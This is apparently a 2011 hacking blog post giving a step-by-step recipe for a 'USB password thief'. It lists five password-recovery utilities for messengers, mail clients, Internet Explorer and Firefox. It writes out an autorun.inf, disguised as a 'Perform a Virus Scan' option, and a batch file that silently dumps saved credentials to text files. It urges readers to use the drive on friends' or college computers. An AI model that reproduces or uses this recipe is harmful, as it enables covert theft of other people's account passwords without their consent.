Monday, 15 August 2011

USB PASSWORD THIEF

Today I will show you how you can get the password from your friends using a USB Thief,actually a rootkit for Hacking.This will be done through using a combination of various softwares.All the tools will be needed to get your victims Password.But note that This rootkit will only steal those passwords which are stored in the OS.
I feel that this Introduction is enough...
LETS START
1)You will need various softwares for this purpose.We shall see this in section.
1 (i) >MessenPass :-MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:
  • MSN Messenger,Windows Messenger (In Windows XP),Windows Live Messenger (In Windows XP/Vista/7),Yahoo Messenger (Versions 5.x and 6.x),Google Talk,ICQ Lite 4.x/5.x/2003,AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro,Trillian,Trillian Astra,Miranda,GAIM/Pidgin, MySpace IM,PaltalkScene,Digsby.
  • MessenPass can only be used to recover the passwords for the current logged-on user on your local computer, and it only works if you chose the remember your password in one of the above programs. You cannot use this utility for grabbing the passwords of other users.                                
  • >(ii)Mail PassView:-Mail PassView is a small password-recovery tool that reveals the passwords and other account details for the following email clients:
  • Outlook Express
  • Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
  • Microsoft Outlook 2002/2003/2007/2010 (POP3, IMAP, HTTP and SMTP Accounts)
  • Windows Mail
  • Windows Live Mail
  • IncrediMail
  • Eudora
  • Netscape 6.x/7.x (If the password is not encrypted with master password)
  • Mozilla Thunderbird (If the password is not encrypted with master password)
  • Group Mail Free
  • Yahoo! Mail - If the password is saved in Yahoo! Messenger application.
  • Hotmail/MSN mail - If the password is saved in MSN/Windows/Live Messenger application.
  • Gmail - If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.
For each email account, the following fields are displayed: Account Name, Application, Email, Server, Server Type (POP3/IMAP/SMTP), User Name, and the Password.


 (iii)>IE Passview:-IE PassView is a small password management utility that reveals the passwords stored by Internet Explorer Web browser, and allows you to delete passwords that you don't need anymore. It supports all versions of Internet Explorer, from version 4.0 and up to 9.0.
For each password that is stored by Internet Explorer, the following information is displayed: Web address, Password Type (AutoComplete, Password-Protected Web Site, or FTP), Storage Location (Registry, Credentials File, or Protected Storage), and the user name/password pair. You can select one or more items from the passwords list and export them into text/html/csv/xml file. 


(iv)> Protected Storage PassView:-Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer. The passwords are revealed by reading the information from the Protected Storage.
Starting from version 1.60, this utility reveals all AutoComplete strings stored in Internet Explorer, not only the AutoComplete password, as in the previous versions.
This utility can show 4 types of passwords:
  1. Outlook passwords: When you create a mail account in Outlook Express or a POP3 account in Microsoft Outlook, and you choose the "Remember password" option in the account properties, the password is saved in the Protected Storage, and this utility can instantly reveal it.
    Be aware that if delete an existing Outlook Express account, the password won't be removed from the Protected Storage. In such a case, the utility won't be able to obtain the user-name of the deleted account, and only the password will be shown.
    Starting from version 1.50, the passwords of Outlook Express identities are also displayed.
  2. AutoComplete passwords in Internet Explorer: Many Web sites provides you a logon screen with user-name and password fields. When you log into the Web site, Internet Explorer may ask you if you want to remember the password for the next time that you log into this Web site. If choose to remember the password, the user-name and the password are saved in the Protected Storage, and thus they can be revealed by Protected Storage PassView.
    In some circumstances, multiple pairs of user-name and passwords are stored for the same logon window. In such case, the additional passwords will be displayed as sub-items of the first user-password pair. In sub-items, the resource name is displayed as 3 dots ('...')
  3. Password-protected sites in Internet Explorer: Some Web sites allows you to log on by using "Basic Authentication" or "Digest Access Authentication". When you enter the Web site, Internet Explorer displays a special logon dialog-box and asks you to enter your user-name and password. Internet Explorer also gives you the option to save the user-name/password pair for the next time you log-on. If you choose to save the logon data, the user-name and the password are saved in the Protected Storage, and thus they can be revealed by Protected Storage PassView.
    In this category, you can also find the passwords of FTP servers.
  4. MSN Explorer Passwords:
    The MSN Explorer browser stores 2 types of passwords in the Protected Storage:
    • Sign-up passwords
    • AutoComplete passwords

By default, this utility shows all 4 types of passwords. You can select to show or hide a specific type of password, by choosing the right password type from the View menu. 

 (v)>PasswordFox: - PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. 

Now you are ready to attack your selected Victim......

BUT YOU NEED SOME MORE THINGS TO PLAY THE TRICK ON

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.(you Can download all ready files here itself)    Click Here(only exe ) Click here(notepad files).
2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP,Vista and 7


Hope You Like This ....Why Dont You Try It Out Now

0 comments:

Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Best Web Hosting Coupons